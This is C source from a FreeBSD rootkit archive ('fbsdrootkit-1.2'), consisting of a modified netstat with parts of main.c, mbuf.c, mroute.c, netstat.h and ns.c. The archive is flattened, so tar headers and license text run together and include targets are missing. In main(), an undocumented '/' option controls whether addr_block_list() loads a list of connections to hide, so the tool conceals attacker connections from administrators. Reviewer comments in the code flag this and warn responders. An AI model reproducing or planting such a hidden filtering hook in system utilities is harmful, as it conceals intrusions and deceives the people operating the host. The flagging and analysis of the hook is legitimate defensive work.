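static struct protox *name2protox __P((char *));
static struct protox *knownname __P((char *));

kvm_t *kvmd;

/*
 * Parse the options, open the kernel image/memory through libkvm, resolve
 * nl[] and dispatch to the routine selected by the flags.  Every path
 * ends in exit() or usage().
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	extern char *optarg;
	extern int optind;
	register struct protoent *p;
	register struct protox *tp;	/* for printing cblocks & stats */
	register char *cp;
	int ch;
	char *nlistf = NULL, *memf = NULL;
	char buf[_POSIX2_LINE_MAX];
	char buf2[_POSIX2_LINE_MAX];

	if (cp = rindex(argv[0], '/'))
		prog = cp + 1;
	else
		prog = argv[0];
	af = AF_UNSPEC;

	/*
	 * NOTE(review): when SHOWFLAG is defined the option string gains a
	 * '/' option that usage() does not list; it sets showall (below).
	 */
#if defined(SHOWFLAG)
	while ((ch = getopt(argc, argv, "Aabdf:ghI:iM:mN:np:rstuw:/")) != EOF)
#else
	while ((ch = getopt(argc, argv, "Aabdf:ghI:iM:mN:np:rstuw:")) != EOF)
#endif
		switch(ch) {
		case 'A':
			Aflag = 1;
			break;
		case 'a':
			aflag = 1;
			break;
		case 'b':
			bflag = 1;
			break;
		case 'd':
			dflag = 1;
			break;
		case 'f':
			if (strcmp(optarg, "ns") == 0)
				af = AF_NS;
			else if (strcmp(optarg, "inet") == 0)
				af = AF_INET;
			else if (strcmp(optarg, "unix") == 0)
				af = AF_UNIX;
			else if (strcmp(optarg, "iso") == 0)
				af = AF_ISO;
			else {
				errx(1, "%s: unknown address family", optarg);
			}
			break;
		case 'g':
			gflag = 1;
			break;
		case 'I': {
			char *cp;

			iflag = 1;
			/* Split "name<unit>": skip the letters, parse the rest. */
			for (cp = interface = optarg;
			    isalpha((unsigned char)*cp); cp++)
				continue;
			unit = atoi(cp);
			break;
		}
		case 'i':
			iflag = 1;
			break;
		case 'M':
			memf = optarg;
			break;
		case 'm':
			mflag = 1;
			break;
		case 'N':
			nlistf = optarg;
			break;
		case 'n':
			nflag = 1;
			break;
		case 'p':
			if ((tp = name2protox(optarg)) == NULL) {
				errx(1,
				     "%s: unknown or uninstrumented protocol",
				     optarg);
			}
			pflag = 1;
			break;
		case 'r':
			rflag = 1;
			break;
		case 's':
			++sflag;
			break;
		case 't':
			tflag = 1;
			break;
		case 'u':
			af = AF_UNIX;
			break;
		case 'w':
			interval = atoi(optarg);
			iflag = 1;
			break;
#if defined(SHOWFLAG)
		case '/':
			showall++;
			break;
#endif
		case '?':
		default:
			usage();
		}
	argv += optind;
	argc -= optind;

#define	BACKWARD_COMPATIBILITY
#ifdef	BACKWARD_COMPATIBILITY
	if (*argv) {
		if (isdigit((unsigned char)**argv)) {
			interval = atoi(*argv);
			if (interval <= 0)
				usage();
			++argv;
			iflag = 1;
		}
		if (*argv) {
			nlistf = *argv;
			if (*++argv)
				memf = *argv;
		}
	}
#endif

	/* Read in a list of connections to block */
	/*
	 * NOTE(review): output-filtering hook.  Unless showall was set by
	 * the '/' option, a block list is loaded here, before the setgid
	 * drop below and before any kernel data is read.  How the list is
	 * applied is not visible in this file -- presumably the connection
	 * printers skip matching entries.  For responders: the output of a
	 * netstat built from this source is not a reliable view of the
	 * host's connections; verify the installed binary against a
	 * known-good checksum and cross-check with a trusted copy.
	 */
	if(!showall) addr_block_list();

	/*
	 * Discard setgid privileges if not the running kernel so that bad
	 * guys can't print interesting stuff from kernel memory.
	 */
	if (nlistf != NULL || memf != NULL) {
		/*
		 * A failed drop must not pass silently: stop rather than
		 * open caller-supplied files with the setgid group.
		 */
		if (setgid(getgid()) != 0)
			err(1, "setgid");
	}

	kvmd = kvm_openfiles(nlistf, memf, NULL, O_RDONLY, buf);
	if (kvmd == NULL) {
		errx(1, "kvm_open: %s", buf);
	}
	if (kvm_nlist(kvmd, nl) < 0) {
		if(nlistf)
			errx(1, "%s: kvm_nlist: %s", nlistf, kvm_geterr(kvmd));
		else
			errx(1, "kvm_nlist: %s", kvm_geterr(kvmd));
	}

	if (nl[0].n_type == 0) {
		if(nlistf)
			errx(1, "%s: no namelist", nlistf);
		else
			errx(1, "no namelist");
	}
	if (mflag) {
		mbpr(nl[N_MBSTAT].n_value);
		exit(0);
	}
	if (pflag) {
		/* tp was set by the -p case above, the only place pflag is set. */
		if (tp->pr_stats)
			(*tp->pr_stats)(nl[tp->pr_sindex].n_value,
				tp->pr_name);
		else
			printf("%s: no stats routine\n", tp->pr_name);
		exit(0);
	}
#if 0
	/*
	 * Keep file descriptors open to avoid overhead
	 * of open/close on each call to get* routines.
	 */
	sethostent(1);
	setnetent(1);
#else
	/*
	 * This does not make sense any more with DNS being default over
	 * the files. Doing a setXXXXent(1) causes a tcp connection to be
	 * used for the queries, which is slower.
	 */
#endif
	if (iflag) {
		intpr(interval, nl[N_IFNET].n_value);
		exit(0);
	}
	if (rflag) {
		if (sflag)
			rt_stats(nl[N_RTSTAT].n_value);
		else
			routepr(nl[N_RTREE].n_value);
		exit(0);
	}
	if (gflag) {
		if (sflag)
			mrt_stats(nl[N_MRTPROTO].n_value,
			    nl[N_MRTSTAT].n_value);
		else
			mroutepr(nl[N_MRTPROTO].n_value,
			    nl[N_MFCTABLE].n_value,
			    nl[N_VIFTABLE].n_value);
		exit(0);
	}
	if (af == AF_INET || af == AF_UNSPEC) {
		setprotoent(1);
		setservent(1);
		/* ugh, this is O(MN) ... why do we do this? */
		while (p = getprotoent()) {
			for (tp = protox; tp->pr_name; tp++)
				if (strcmp(tp->pr_name, p->p_name) == 0)
					break;
			if (tp->pr_name == 0 || tp->pr_wanted == 0)
				continue;
			printproto(tp, p->p_name);
		}
		endprotoent();
	}
	if (af == AF_NS || af == AF_UNSPEC)
		for (tp = nsprotox; tp->pr_name; tp++)
			printproto(tp, tp->pr_name);
	if (af == AF_ISO || af == AF_UNSPEC)
		for (tp = isoprotox; tp->pr_name; tp++)
			printproto(tp, tp->pr_name);
	if ((af == AF_UNIX || af == AF_UNSPEC) && !sflag)
		unixpr(nl[N_UNIXSW].n_value);
	exit(0);
}

/*
 * Print out protocol statistics or control blocks (per sflag).
 * If the interface was not specifically requested, and the symbol
 * is not in the namelist, ignore this one.
 */
static void
printproto(tp, name)
	register struct protox *tp;
	char *name;
{
	void (*pr)();
	u_char idx;
	u_long off;

	if (sflag) {
		pr = tp->pr_stats;
		idx = tp->pr_sindex;
	} else {
		pr = tp->pr_cblocks;
		idx = tp->pr_index;
	}
	/*
	 * Entries without a routine carry -1 (255 as u_char) as their index.
	 * Check the routine first so nl[] is never read out of bounds.
	 */
	if (pr == NULL)
		return;
	off = nl[idx].n_value;
	if (off || af != AF_UNSPEC)
		(*pr)(off, name);
}

/*
 * Read kernel memory, return 0 on success.
 * On a short or failed read the libkvm error is reported with warnx()
 * and -1 is returned.
 */
int
kread(addr, buf, size)
	u_long addr;
	char *buf;
	int size;
{

	if (kvm_read(kvmd, addr, buf, size) != size) {
		warnx("%s", kvm_geterr(kvmd));
		return (-1);
	}
	return (0);
}

/* Suffix for a regular plural: "" when n is 1, "s" otherwise. */
char *
plural(n)
	int n;
{
	return (n != 1 ? "s" : "");
}

/* Suffix for an "-es" plural: "" when n is 1, "es" otherwise. */
char *
plurales(n)
	int n;
{
	return (n != 1 ? "es" : "");
}

/*
 * Find the protox for the given "well-known" name.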
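*/
static struct protox *
knownname(name)
	char *name;
{
	struct protox **tpp, *tp;

	/*
	 * protoprotox is walked until a NULL table pointer; each table is
	 * walked until an entry whose pr_name is NULL.
	 */
	for (tpp = protoprotox; *tpp; tpp++)
		for (tp = *tpp; tp->pr_name; tp++)
			if (strcmp(tp->pr_name, name) == 0)
				return (tp);
	return (NULL);
}

/*
 * Find the protox corresponding to name.
 *
 * Returns the matching entry, or NULL when name is neither a known
 * protocol name nor an alias listed by getprotoent().
 */
static struct protox *
name2protox(name)
	char *name;
{
	struct protox *tp;
	char **alias;			/* alias from p->aliases */
	struct protoent *p;

	/*
	 * Try to find the name in the list of "well-known" names. If that
	 * fails, check if name is an alias for an Internet protocol.
	 */
	if ((tp = knownname(name)) != NULL)
		return (tp);

	setprotoent(1);			/* make protocol lookup cheaper */
	while ((p = getprotoent()) != NULL) {
		/* assert: name not same as p->name */
		for (alias = p->p_aliases; *alias; alias++)
			if (strcmp(name, *alias) == 0) {
				endprotoent();
				return (knownname(p->p_name));
			}
	}
	endprotoent();
	return (NULL);
}

/*
 * Print the command synopsis on stderr and exit with status 1.
 */
static void
usage()
{
	(void)fprintf(stderr,
"usage: %s [-Aan] [-f address_family] [-M core] [-N system]\n", prog);
	(void)fprintf(stderr,
" %s [-bdghimnrs] [-f address_family] [-M core] [-N system]\n", prog);
	(void)fprintf(stderr,
" %s [-bdn] [-I interface] [-M core] [-N system] [-w wait]\n", prog);
	(void)fprintf(stderr,
" %s [-M core] [-N system] [-p protocol]\n", prog);
	exit(1);
}

/*
 * Truncate the host name in cp, in place, at the dot that precedes the
 * local domain.  The local domain is taken from gethostname() on the
 * first call and cached; names outside that domain are left unchanged.
 */
void
trimdomain(cp)
	char *cp;
{
	/*
	 * Static storage starts zeroed and gethostname() is given one byte
	 * less than the buffer, so domain[] is always NUL-terminated.
	 */
	static char domain[MAXHOSTNAMELEN + 1];
	static int first = 1;
	char *s;

	if (first) {
		first = 0;
		if (gethostname(domain, MAXHOSTNAMELEN) == 0 &&
		    (s = strchr(domain, '.')) != NULL) {
			/*
			 * Source and destination overlap inside domain[];
			 * strcpy() is undefined for overlapping objects, so
			 * shift the suffix down with memmove() (NUL included).
			 */
			(void) memmove(domain, s + 1, strlen(s + 1) + 1);
		} else
			domain[0] = 0;
	}

	if (domain[0]) {
		while ((cp = strchr(cp, '.'))) {
			if (!strcasecmp(cp + 1, domain)) {
				*cp = 0;	/* hit it */
				break;
			} else {
				cp++;
			}
		}
	}
}
fbsdrootkit-1.2/netstat/mbuf.c100600 764 0 10345 5723156433 14256 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1.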
Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
*/ #ifndef lint static char sccsid[] = "@(#)mbuf.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ #include #include #include #include #include #include "netstat.h" #define YES 1 typedef int bool; struct mbstat mbstat; static struct mbtypes { int mt_type; char *mt_name; } mbtypes[] = { { MT_DATA, "data" }, { MT_OOBDATA, "oob data" }, { MT_CONTROL, "ancillary data" }, { MT_HEADER, "packet headers" }, { MT_SOCKET, "socket structures" }, /* XXX */ { MT_PCB, "protocol control blocks" }, /* XXX */ { MT_RTABLE, "routing table entries" }, /* XXX */ { MT_HTABLE, "IMP host table entries" }, /* XXX */ { MT_ATABLE, "address resolution tables" }, { MT_FTABLE, "fragment reassembly queue headers" }, /* XXX */ { MT_SONAME, "socket names and addresses" }, { MT_SOOPTS, "socket options" }, { MT_RIGHTS, "access rights" }, { MT_IFADDR, "interface addresses" }, /* XXX */ { 0, 0 } }; int nmbtypes = sizeof(mbstat.m_mtypes) / sizeof(short); bool seen[256]; /* "have we seen this type yet?" */ /* * Print mbuf statistics. 
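*/
void
mbpr(mbaddr)
	u_long mbaddr;
{
	register int totmem, totfree, totmbufs;
	register int i;
	register struct mbtypes *mp;
	int in_use_pct;

	/* seen[] has 256 slots; refuse to run if mbstat no longer matches. */
	if (nmbtypes != 256) {
		warnx("unexpected change to mbstat; check source");
		return;
	}
	if (mbaddr == 0) {
		warnx("mbstat: symbol not in namelist");
		return;
	}
	/* kread() returns non-zero on failure and has already warned. */
	if (kread(mbaddr, (char *)&mbstat, sizeof (mbstat)))
		return;

	totmbufs = 0;
	for (mp = mbtypes; mp->mt_name; mp++)
		totmbufs += mbstat.m_mtypes[mp->mt_type];
	printf("%u mbufs in use:\n", totmbufs);

	/* Named types first, remembering which slots were reported. */
	for (mp = mbtypes; mp->mt_name; mp++)
		if (mbstat.m_mtypes[mp->mt_type]) {
			seen[mp->mt_type] = YES;
			printf("\t%u mbufs allocated to %s\n",
			    mbstat.m_mtypes[mp->mt_type], mp->mt_name);
		}
	seen[MT_FREE] = YES;

	/*
	 * Any remaining non-zero slot has no name in mbtypes[].  The copy
	 * under review passed the index i with no conversion to print it;
	 * the "<mbuf type %d>" text is restored so the argument is used.
	 */
	for (i = 0; i < nmbtypes; i++)
		if (!seen[i] && mbstat.m_mtypes[i]) {
			printf("\t%u mbufs allocated to <mbuf type %d>\n",
			    mbstat.m_mtypes[i], i);
		}

	printf("%u/%u mbuf clusters in use\n",
	    mbstat.m_clusters - mbstat.m_clfree, mbstat.m_clusters);
	totmem = totmbufs * MSIZE + mbstat.m_clusters * MCLBYTES;
	totfree = mbstat.m_clfree * MCLBYTES;
	/*
	 * The counters come from kernel memory (or from the core file named
	 * with -M); a zeroed mbstat would otherwise divide by zero here.
	 */
	in_use_pct = totmem ? (totmem - totfree) * 100 / totmem : 0;
	printf("%u Kbytes allocated to network (%d%% in use)\n",
	    totmem / 1024, in_use_pct);
	printf("%u requests for memory denied\n", mbstat.m_drops);
	printf("%u requests for memory delayed\n", mbstat.m_wait);
	printf("%u calls to protocol drain routines\n", mbstat.m_drain);
}
fbsdrootkit-1.2/netstat/mroute.c100600 764 0 16112 6023335677 14641 0ustar dfroot/* * Copyright (c) 1989 Stephen Deering * Copyright (c) 1992, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Stephen Deering of Stanford University. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2.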
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)mroute.c 8.1 (Berkeley) 6/6/93 */ /* * Print DVMRP multicast routing structures and statistics. * * MROUTING 1.0 */ #include #include #include #include #include #include #include #include #include #define KERNEL 1 /* XXX bogus! 
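*/
#include
#undef KERNEL
#include
#include

#include "netstat.h"

/*
 * Print the virtual interface table and the multicast forwarding cache.
 *
 * mrpaddr, mfcaddr and vifaddr are the kernel addresses of the routing
 * protocol number, the forwarding-cache hash table and the vif table.
 * Nothing is printed for a table whose kernel read fails.
 */
void
mroutepr(mrpaddr, mfcaddr, vifaddr)
	u_long mrpaddr, mfcaddr, vifaddr;
{
	u_int mrtproto;
	struct mbuf *mfctable[MFCTBLSIZ];
	struct vif viftable[MAXVIFS];
	struct mbuf mb, *m;
	struct mfc smfc;
	register struct vif *v;
	register vifi_t vifi;
	register int i;
	register int banner_printed;
	register int saved_nflag;
	vifi_t maxvif = 0;	/* was read uninitialized when no vif is in use */

	if (mrpaddr == 0) {
		printf("ip_mrtproto: symbol not in namelist\n");
		return;
	}

	/* Do not switch on mrtproto if it was never filled in. */
	if (kread(mrpaddr, (char *)&mrtproto, sizeof(mrtproto)))
		return;
	switch (mrtproto) {

	case 0:
		printf("no multicast routing compiled into this system\n");
		return;

	case IGMP_DVMRP:
		break;

	default:
		printf("multicast routing protocol %u, unknown\n", mrtproto);
		return;
	}

	if (mfcaddr == 0) {
		printf("mfctable: symbol not in namelist\n");
		return;
	}
	if (vifaddr == 0) {
		printf("viftable: symbol not in namelist\n");
		return;
	}

	/* Addresses are printed numerically here; nflag is restored below. */
	saved_nflag = nflag;
	nflag = 1;

	if (kread(vifaddr, (char *)&viftable, sizeof(viftable)))
		goto out;
	banner_printed = 0;
	for (vifi = 0, v = viftable; vifi < MAXVIFS; ++vifi, ++v) {
		/* A zero local address marks an unused slot. */
		if (v->v_lcl_addr.s_addr == 0)
			continue;

		maxvif = vifi;
		if (!banner_printed) {
			printf("\nVirtual Interface Table\n"
			       " Vif Thresh Rate Local-Address "
			       "Remote-Address Pkts-In Pkts-Out\n");
			banner_printed = 1;
		}

		printf(" %2u %6u %4d %-15.15s",
		    vifi, v->v_threshold, v->v_rate_limit,
		    routename(v->v_lcl_addr.s_addr));
		printf(" %-15.15s", (v->v_flags & VIFF_TUNNEL) ?
		    routename(v->v_rmt_addr.s_addr) : "");

		printf(" %9lu %9lu\n", v->v_pkt_in, v->v_pkt_out);
	}
	if (!banner_printed)
		printf("\nVirtual Interface Table is empty\n");

	if (kread(mfcaddr, (char *)&mfctable, sizeof(mfctable)))
		goto out;
	banner_printed = 0;
	for (i = 0; i < MFCTBLSIZ; ++i) {
		m = mfctable[i];
		while (m) {
			/*
			 * A failed read would leave mb holding the previous
			 * entry, so stop following this chain instead of
			 * re-walking stale m_act pointers.
			 */
			if (kread((u_long)m, (char *)&mb, sizeof mb))
				break;
			m = &mb;

			if (!banner_printed) {
				printf("\nMulticast Forwarding Cache\n"
				       " Origin Group "
				       " Packets In-Vif Out-Vifs:Ttls\n");
				banner_printed = 1;
			}

			if (kread((u_long)mtod(m, char *),
			    (char *)&smfc, sizeof smfc))
				break;
			printf(" %-15.15s", routename(smfc.mfc_origin.s_addr));
			printf(" %-15.15s", routename(smfc.mfc_mcastgrp.s_addr));
			printf(" %9lu", smfc.mfc_pkt_cnt);
			printf(" %3d ", smfc.mfc_parent);
			/* maxvif is always below MAXVIFS: it is set from vifi above. */
			for (vifi = 0; vifi <= maxvif; vifi++) {
				if (smfc.mfc_ttls[vifi] > 0)
					printf(" %u:%u", vifi,
					    smfc.mfc_ttls[vifi]);
			}
			printf("\n");
			m = m->m_act;
		}
	}
	if (!banner_printed)
		printf("\nMulticast Routing Table is empty\n");

	printf("\n");
out:
	nflag = saved_nflag;
}

/*
 * Print multicast forwarding statistics.
 *
 * mrpaddr and mstaddr are the kernel addresses of the routing protocol
 * number and of the mrtstat counters.
 */
void
mrt_stats(mrpaddr, mstaddr)
	u_long mrpaddr, mstaddr;
{
	u_int mrtproto;
	struct mrtstat mrtstat;

	if (mrpaddr == 0) {
		printf("ip_mrtproto: symbol not in namelist\n");
		return;
	}

	/* Do not switch on mrtproto if it was never filled in. */
	if (kread(mrpaddr, (char *)&mrtproto, sizeof(mrtproto)))
		return;
	switch (mrtproto) {
	case 0:
		printf("no multicast routing compiled into this system\n");
		return;

	case IGMP_DVMRP:
		break;

	default:
		printf("multicast routing protocol %u, unknown\n", mrtproto);
		return;
	}

	if (mstaddr == 0) {
		printf("mrtstat: symbol not in namelist\n");
		return;
	}

	/* Uninitialized stack contents must not be printed as counters. */
	if (kread(mstaddr, (char *)&mrtstat, sizeof(mrtstat)))
		return;
	printf("multicast forwarding:\n");
	printf(" %10u multicast forwarding cache lookup%s\n",
	    mrtstat.mrts_mfc_lookups, plural(mrtstat.mrts_mfc_lookups));
	printf(" %10u multicast forwarding cache miss%s\n",
	    mrtstat.mrts_mfc_misses, plurales(mrtstat.mrts_mfc_misses));
	printf(" %10u upcall%s to mrouted\n",
	    mrtstat.mrts_upcalls, plural(mrtstat.mrts_upcalls));
	printf(" %10u upcall queue overflow%s\n",
	    mrtstat.mrts_upq_ovflw, plural(mrtstat.mrts_upq_ovflw));
	printf(" %10u upcall%s dropped due to full socket buffer\n",
	    mrtstat.mrts_upq_sockfull, plural(mrtstat.mrts_upq_sockfull));
	printf(" %10u cache cleanup%s\n",
	    mrtstat.mrts_cache_cleanups, plural(mrtstat.mrts_cache_cleanups));
	printf(" %10u datagram%s with no route for origin\n",
	    mrtstat.mrts_no_route, plural(mrtstat.mrts_no_route));
	printf(" %10u datagram%s arrived with bad tunneling\n",
	    mrtstat.mrts_bad_tunnel, plural(mrtstat.mrts_bad_tunnel));
	printf(" %10u datagram%s could not be tunneled\n",
	    mrtstat.mrts_cant_tunnel, plural(mrtstat.mrts_cant_tunnel));
	printf(" %10u datagram%s arrived on wrong interface\n",
	    mrtstat.mrts_wrong_if, plural(mrtstat.mrts_wrong_if));
	printf(" %10u datagram%s selectively dropped\n",
	    mrtstat.mrts_drop_sel, plural(mrtstat.mrts_drop_sel));
	printf(" %10u datagram%s dropped due to queue overflow\n",
	    mrtstat.mrts_q_overflow, plural(mrtstat.mrts_q_overflow));
	printf(" %10u datagram%s dropped for being too large\n",
	    mrtstat.mrts_pkt2large, plural(mrtstat.mrts_pkt2large));
}
fbsdrootkit-1.2/netstat/netstat.h100600 764 0 7730 5646654777 15022 0ustar dfroot/* * Copyright (c) 1992, 1993 * Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4.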
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)netstat.h 8.2 (Berkeley) 1/4/94 */ #include int Aflag; /* show addresses of protocol control block */ int aflag; /* show all sockets (including servers) */ int bflag; /* show i/f total bytes in/out */ int dflag; /* show i/f dropped packets */ int gflag; /* show group (multicast) routing or stats */ int iflag; /* show interfaces */ int mflag; /* show memory stats */ int nflag; /* show addresses numerically */ int pflag; /* show given protocol */ int rflag; /* show routing tables (or routing stats) */ int sflag; /* show protocol statistics */ int tflag; /* show i/f watchdog timers */ int interval; /* repeat interval for i/f stats */ char *interface; /* desired i/f for stats, or NULL for all i/fs */ int unit; /* unit number for above */ int af; /* address family */ char *prog; /* program name */ int kread __P((u_long addr, char *buf, int size)); char *plural __P((int)); char *plurales __P((int)); void protopr __P((u_long, char *)); void tcp_stats __P((u_long, char *)); void udp_stats __P((u_long, char *)); void ip_stats 
__P((u_long, char *)); void icmp_stats __P((u_long, char *)); void igmp_stats __P((u_long, char *)); void protopr __P((u_long, char *)); void mbpr(u_long); void hostpr __P((u_long, u_long)); void impstats __P((u_long, u_long)); void intpr __P((int, u_long)); void pr_rthdr __P(()); void pr_family __P((int)); void rt_stats __P((u_long)); char *ns_phost __P((struct sockaddr *)); void upHex __P((char *)); char *routename __P((u_long)); char *netname __P((u_long, u_long)); char *ns_print __P((struct sockaddr *)); void routepr __P((u_long)); void nsprotopr __P((u_long, char *)); void spp_stats __P((u_long, char *)); void idp_stats __P((u_long, char *)); void nserr_stats __P((u_long, char *)); void intpr __P((int, u_long)); void unixpr __P((u_long)); void esis_stats __P((u_long, char *)); void clnp_stats __P((u_long, char *)); void cltp_stats __P((u_long, char *)); void iso_protopr __P((u_long, char *)); void iso_protopr1 __P((u_long, int)); void tp_protopr __P((u_long, char *)); void tp_inproto __P((u_long)); void tp_stats __P((caddr_t, caddr_t)); void mroutepr __P((u_long, u_long, u_long)); void mrt_stats __P((u_long, u_long)); fbsdrootkit-1.2/netstat/ns.c100600 764 0 25754 5571373150 13755 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. 
All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)ns.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define SANAMES #include #include #include #include #include #include "netstat.h" struct nspcb nspcb; struct sppcb sppcb; struct socket sockb; static char *ns_prpr __P((struct ns_addr *)); static void ns_erputil __P((int, int)); static int first = 1; /* * Print a summary of connections related to a Network Systems * protocol. For SPP, also give state of connection. * Listening processes (aflag) are suppressed unless the * -a (all) flag is specified. 
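*/
/*
 * off is the kernel address of the head of the nspcb list for the
 * protocol called name; an off of 0 prints nothing.  The walk stops as
 * soon as a kernel read fails.
 */
void
nsprotopr(off, name)
	u_long off;
	char *name;
{
	struct nspcb cb;
	register struct nspcb *prev, *next;
	int isspp;

	if (off == 0)
		return;
	isspp = strcmp(name, "spp") == 0;
	/* Without the list head there is nothing valid to walk. */
	if (kread(off, (char *)&cb, sizeof (struct nspcb)))
		return;
	nspcb = cb;
	prev = (struct nspcb *)off;
	if (nspcb.nsp_next == (struct nspcb *)off)
		return;
	for (;nspcb.nsp_next != (struct nspcb *)off; prev = next) {
		u_long ppcb;

		next = nspcb.nsp_next;
		/*
		 * On a failed read nspcb still holds the previous entry,
		 * which would make the loop revisit the same pointer.
		 */
		if (kread((u_long)next, (char *)&nspcb, sizeof (nspcb)))
			break;
		/* The back link must match the entry we came from. */
		if (nspcb.nsp_prev != prev) {
			printf("???\n");
			break;
		}
		if (!aflag && ns_nullhost(nspcb.nsp_faddr) ) {
			continue;
		}
		if (kread((u_long)nspcb.nsp_socket,
		    (char *)&sockb, sizeof (sockb)))
			break;
		ppcb = (u_long) nspcb.nsp_pcb;
		if (ppcb) {
			if (isspp) {
				if (kread(ppcb, (char *)&sppcb,
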